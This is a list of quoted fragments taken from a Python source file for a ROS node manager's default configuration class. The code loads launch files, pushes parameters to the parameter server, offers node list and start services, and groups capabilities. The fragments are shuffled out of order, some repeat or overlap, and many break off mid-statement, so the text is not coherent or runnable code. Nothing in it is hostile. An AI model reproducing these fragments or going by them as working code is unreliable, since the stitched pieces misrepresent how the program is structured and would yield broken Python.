"description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines:",
"for a launch file. If package is given, try first to find the",
"''' Returns the current description. ''' return self.description_response def loadParams(self): ''' Loads all",
"= rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\"",
"None '''@ivar: The service will be created on each load of a launch",
"autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter =",
"'%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd =",
"= [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS",
"= roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if",
"in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed",
"file. If package is given, try first to find the launch file in",
"''' Start the node with given name from the currently loaded configuration. @param",
"the loaded configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar:",
"or array of string if sys.version_info[0] <= 2: import types string_types = types.StringTypes",
"return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except:",
"source code must retain the above copyright # notice, this list of conditions",
"= ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from sys.argv",
"FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE",
"os.path.exists(launch_file): return launch_file raise LoadException('File %s in package [%s] not found!' % (path,",
"rosservice_load_launch(self, req): # ''' # Load the launch file # ''' # try:",
"1: raise StartException(\"Failed to set parameter: %s\" % (msg)) except Exception: raise #",
"'') '''@ivar: robot description as tupel of (type, name, text) ''' self.package =",
"return [] def rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self, req): #",
"traceback # print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in",
"v # the ROS_NAMESPACE environment is used in cpp plugins in rqt if",
"self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self, req):",
"respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn",
"5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore\",",
"start_now = True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required:",
"namespace of the node if ns not in result[machine_name]: result[machine_name][ns] = dict() if",
"str @return: the decoded string @rtype: C{unicode} or original on error ''' result",
"roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns",
"start_now = True break if not start_now: # Start the timer for waiting",
"WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN",
"rospy.set_param('~autostart', False) # initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service =",
"the node if ns not in result[machine_name]: result[machine_name][ns] = dict() if p.value not",
"INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT",
"'name', 'images', 'description'] -> ignore\", param) else: for entry in p.value: try: print(entry[0],",
"4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore\", param) else: for",
"not found ''' launch_file = path # if package is set, try to",
"robot description as tupel of (type, name, text) ''' self.package = '' self.file",
"= dict() capabilies_descr = dict() if self.roscfg is not None: # get the",
"the package, the first one will be tacked. @param path: the file name",
"node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in exclude",
"''' result = dict() capabilies_descr = dict() if self.roscfg is not None: #",
"# handle different result types str or array of string if sys.version_info[0] <=",
"import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv",
"if itemname == node: n = item break if n is None: raise",
"topic, datatype in master.getPublishedTopics(''): if start_required == topic: start_now = True break if",
"parameters onto the parameter server \"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client",
"prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS",
"local namespace sys.argv = list(argv) # set the global environment to empty namespace",
"wait for process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() #",
"or len(cmd) == 0: raise StartException('%s in package [%s] not found!' % (filename,",
"if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 4:",
"to clear parameter: %s\"%(msg)) # multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server)",
"entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes for item in self.roscfg.nodes: node_fullname",
"ScreenHandlerException class LoadException(Exception): ''' The exception throwing while searching for the given launch",
"(n.cwd is None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd ==",
"None: # get the capabilities description # use two separate loops, to create",
"result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the master URI depending on ROS",
"t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True)",
"file @rtype: C{str} @raise LoadException: if the given file is not found '''",
"run a node containing in the loaded configuration. ''' pass class DefaultCfg(object): def",
"req.file, req.argv) # finally: # self.__lock.release() # return [] def rosservice_description(self, req): '''",
"parameter: %s\" % (msg)) except Exception: raise # re-raise as this is fatal",
"AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE",
"= threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) #",
"self.nodes: try: self.runNode(n, self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start %s: %s\",",
"cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple nodes, invalid package",
"in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is not",
"or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images =",
"def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return",
"ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription,",
"THE # POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import",
"'.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV'",
"use in source and binary forms, with or without # modification, are permitted",
"in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if machine_name not in result: result[machine_name]",
"in package [%s] not found!' % (path, package)) def rosservice_list_nodes(self, req): ''' Callback",
"the list with node names for item in self.roscfg.nodes: if item.machine_name and not",
"''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the ROS service to",
"list of conditions and the following # disclaimer in the documentation and/or other",
"_load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto the parameter server \"\"\" try:",
"name, text) ''' self.package = '' self.file = '' self.__lock = threading.RLock() #",
"namespace sys.argv = list(argv) # set the global environment to empty namespace os.environ[ROS_NAMESPACE]",
"too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi()",
"the launch file @type path: C{str} @param package: the package containing the launch",
"BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES",
"try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import",
"if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description':",
"# Software License Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US,",
"# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #",
"self.description_response = ListDescriptionResponse() # variables to print the pending autostart nodes self._pending_starts =",
"prefix = n.launch_prefix if n.launch_prefix is not None else '' args = ['__ns:=%s'",
"remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1])) # masteruri = self.masteruri # if",
"None: self.runService.shutdown('reload config') self.runService = None if self.listService is not None: self.listService.shutdown('reload config')",
"import shlex import std_srvs.srv import subprocess import sys import threading from .screen_handler import",
"= cap_ns # add new group in the namespace of the node if",
"in package [%s] not found!' % (filename, pkg)) return cmd def _get_start_exclude(self, node):",
"Load the launch file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the services",
"found in the package, the first one will be tacked. @param path: the",
"'', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns the master URI",
"autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in exclude list, skip",
"except: pass return topic def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0,",
"param, value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params,",
"'\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False): ''' Start",
"return [] def rosservice_description(self, req): ''' Returns the current description. ''' return self.description_response",
"node cwd = self.get_ros_home() if not (n.cwd is None): if n.cwd == 'ROS_HOME':",
"the following conditions # are met: # # * Redistributions of source code",
"LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR",
"be created on each load of a launch file to inform the caller",
"descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros()",
"= machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the current working",
"cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found, assign node to",
"0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic",
"p.value) r = param_server_multi() for code, msg, _ in r: if code !=",
"[]) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\" %",
"and the following disclaimer. # * Redistributions in binary form must reproduce the",
"def getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities} and C{capability_group} parameter and",
"try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name",
"thread.setDaemon(True) thread.start() # remove from pending autostarts try: self._pending_starts.remove(node) except: pass # print",
"parameter group parameter found, assign node to the group if not cap_ns: cap_ns",
"0: # if more then one launch file is found, take the first",
": dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))} ''' result",
"the first one will be tacked. @param path: the file name of the",
"for the ROS service to get the list with available nodes. ''' return",
"result[machine_name].items(): if ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True",
"decoded string @rtype: C{unicode} or original on error ''' result = val.replace(\"\\\\n \",",
"= True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required: start_now",
"# if package is set, try to find the launch file in the",
"file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the services to inform the",
"raise StartException('%s in package [%s] not found!' % (filename, pkg)) return cmd def",
"of a launch file to inform the caller about a new configuration. '''",
"from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi",
"package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if more then",
"parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code, msg, _ in",
"BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN",
"new configuration. ''' self.listService = None '''@ivar: The service will be created on",
"distribution API. @return: ROS master URI @rtype: C{str} ''' try: import rospkg.distro distro",
"file is not found ''' launch_file = path # if package is set,",
"path @type package: C{str} @return: the absolute path of the launch file @rtype:",
"if machine_name not in result: result[machine_name] = dict() for (ns, groups) in result[machine_name].items():",
"set the global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path,",
"and start_required: start_now = False # get published topics from ROS master master",
"else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService",
"load(self, delay_service_creation=0.): ''' Load the launch file configuration ''' with self.__lock: self._pending_starts.clear() #",
"multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import",
"!= 4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore\", param) else:",
"shlex import std_srvs.srv import subprocess import sys import threading from .screen_handler import ScreenHandler",
"'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes for item in self.roscfg.nodes:",
"def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return",
"self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description",
"self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False): ''' Start the node with",
"file is found, take the first one launch_file = paths[0] if os.path.isfile(launch_file) and",
"self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService",
"%s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart =",
"{} '''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor name, sensor description),",
"was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node)",
"self.nodes = [] '''@ivar: the list with names of nodes with name spaces.'''",
"cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print",
"continue result.append(a) return result def load(self, delay_service_creation=0.): ''' Load the launch file configuration",
"required topic `%s` is ignored!' % topic) topic = '' elif not rosgraph.names.is_global(topic):",
"= rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else:",
"server \"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server =",
"an empty string, if the C{file} is an absolute path @type package: C{str}",
"result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except:",
"= ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr = '' for param,",
"configuration. ''' pass class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the list",
"given package if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0: #",
"None if self.listService is not None: self.listService.shutdown('reload config') self.listService = None self.nodes =",
"Sensor description: C{dict(node name : [(sensor type, sensor name, sensor description), ...])}''' self.robot_descr",
"start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now and",
"OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER",
"not found!' % (filename, pkg)) return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node,",
"start_required = self._get_start_required(node) if autostart and start_required: start_now = False # get published",
"in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not added: ns = cap_ns",
"break if n is None: raise StartException(\"Node '%s' not found!\" % node) if",
"'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node,",
"not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s",
"ROS master URI @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if",
"import threading from .screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The",
"text) ''' self.package = '' self.file = '' self.__lock = threading.RLock() # Load",
"format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore\", param) else:",
"def _decode(self, val): ''' Replaces the '\\\\n' by LF (Line Feed) and decode",
"# finally: # self.__lock.release() # return [] def rosservice_description(self, req): ''' Returns the",
"try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple nodes, invalid",
"0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation,",
"topic) topic = '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass",
"self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self,",
"os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File %s in package [%s] not found!'",
"published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''):",
"derived # from this software without specific prior written permission. # # THIS",
"break except: pass # get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine,",
"subprocess import sys import threading from .screen_handler import ScreenHandler # , ScreenHandlerException class",
"if n is None: raise StartException(\"Node '%s' not found!\" % node) if autostart",
"if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY',",
"name spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node name : [(sensor type,",
"if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is ignored!' % topic) topic",
"r: # if code != 1: # raise StartException(\"Failed to clear parameter: %s\"%(msg))",
"None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple nodes,",
"n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace,",
"for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace = ns",
"= False def _decode(self, val): ''' Replaces the '\\\\n' by LF (Line Feed)",
"rospkg return rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def",
"= item.machine_name if item.machine_name is not None and not item.machine_name == 'localhost' else",
"ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from",
"NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY",
"= {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability nodes for",
"in result[machine_name].items(): if ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added =",
"roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the capability group parameter in namespace",
"self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def",
"= rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node):",
"OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF",
"= self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args: # env[len(env):] = machine.env_args",
"@param path: the file name of the launch file @type path: C{str} @param",
"with the same name found in the package, the first one will be",
"self.roscfg, verbose=False, argv=argv) # create the list with node names for item in",
"if self.listService is not None: self.listService.shutdown('reload config') self.listService = None self.nodes = []",
"rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service will be created on",
"in binary form must reproduce the above # copyright notice, this list of",
"launch file to inform the caller about a new configuration. ''' self.listService =",
"THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF",
"the launch file @rtype: C{str} @raise LoadException: if the given file is not",
"name found in the package, the first one will be tacked. @param path:",
"env = n.env_args prefix = n.launch_prefix if n.launch_prefix is not None else ''",
"MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT",
"new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise StartException('Multiple executables are found!",
"OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS",
"topic = '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return",
"Searches for a launch file. If package is given, try first to find",
"cap_ns = roslib.names.SEP # if the 'capability_group' parameter found, assign node to the",
"while searching for the given launch file. ''' pass class StartException(Exception): ''' The",
"= n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart)",
"path @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in",
"C{capabilities} and C{capability_group} parameter and creates dictionary for grouping the nodes. @return: the",
"the string coding as system default @type val: str @return: the decoded string",
"self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise StartException('Multiple executables",
"in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' : str, 'description' : str,",
"self._get_node(n.package, n.type) # determine the current working path, Default: the package of the",
"node '%s as': %s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV'",
"'localhost' else '' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname",
"in r: if code != 1: raise StartException(\"Failed to set parameter: %s\" %",
"from sys.argv to avoid load the launchfile info local namespace sys.argv = list(argv)",
"import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse,",
"cmd = None try: cmd = roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: #",
"return 0. def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try:",
"if package is set, try to find the launch file in the given",
"try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() # return",
"sys.argv = list(argv) # set the global environment to empty namespace os.environ[ROS_NAMESPACE] =",
"the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self, argv):",
"'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock:",
"'__name:=%s' % n.name] if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add",
"on error ''' result = val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except:",
"description # use two separate loops, to create the description list first for",
"The exception throwing while run a node containing in the loaded configuration. '''",
"def _timed_service_creation(self): with self.__lock: try: if self.runService is None: self.runService = rospy.Service('~run', Task,",
"objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing",
"= [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set the respawn environment",
"import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os import rosgraph.masterapi import rosgraph.names",
"the ROS service to start a node. ''' self.runNode(req.node) return [] def rosservice_reload(self,",
"file for C{capabilities} and C{capability_group} parameter and creates dictionary for grouping the nodes.",
"= True break if not added: ns = cap_ns # add new group",
"if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def",
"# try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() #",
"== 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) #",
"load parameters into the ROS parameter server if self.load_params_at_start: self.loadParams() # initialize the",
"self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required: start_now = False # get",
"self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes,",
"= item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found, assign node to the",
"to the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param] if",
"rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd = None",
"rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name) return # env = n.env_args",
"self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] = dict() for (ns, groups) in",
"popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd))) #",
"one launch file is found, take the first one launch_file = paths[0] if",
"ListDescriptionResponse() # variables to print the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed",
"len(paths) > 0: # if more then one launch file is found, take",
"sensor description), ...])}''' self.robot_descr = ('', '', '') '''@ivar: robot description as tupel",
"rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd,",
"topic `%s` is ignored!' % topic) topic = '' elif not rosgraph.names.is_global(topic): topic",
"absolute path of the launch file @rtype: C{str} @raise LoadException: if the given",
"if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) #",
"return launch_file raise LoadException('File %s in package [%s] not found!' % (path, package))",
"respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d'",
"env=env) # wait for process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True)",
"def get_ros_home(self): ''' Returns the ROS HOME path depending on ROS distribution API.",
"Load the launch file # ''' # try: # self.__lock.acquire() # self.load(req.package, req.file,",
"first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value)",
"groups) in result[machine_name].items(): if ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added",
"rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for",
"'__name:=', '_package:=', '_launch_file:='] result = [] for a in argv: in_filter = False",
"binary forms, with or without # modification, are permitted provided that the following",
"% n.name] if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add remaps",
"ignored!' % topic) topic = '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic)",
"OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #",
"# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED",
"value in self.roscfg.params.items(): params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params)",
"nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if",
"if more then one launch file is found, take the first one launch_file",
"...])}''' self.robot_descr = ('', '', '') '''@ivar: robot description as tupel of (type,",
"= list(argv) # set the global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP",
"self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart:",
"node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for",
"# find the capability group parameter in namespace while cap_param not in self.roscfg.params",
"p = self.roscfg.params[cap_param] if machine_name not in result: result[machine_name] = dict() for (ns,",
"False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv)",
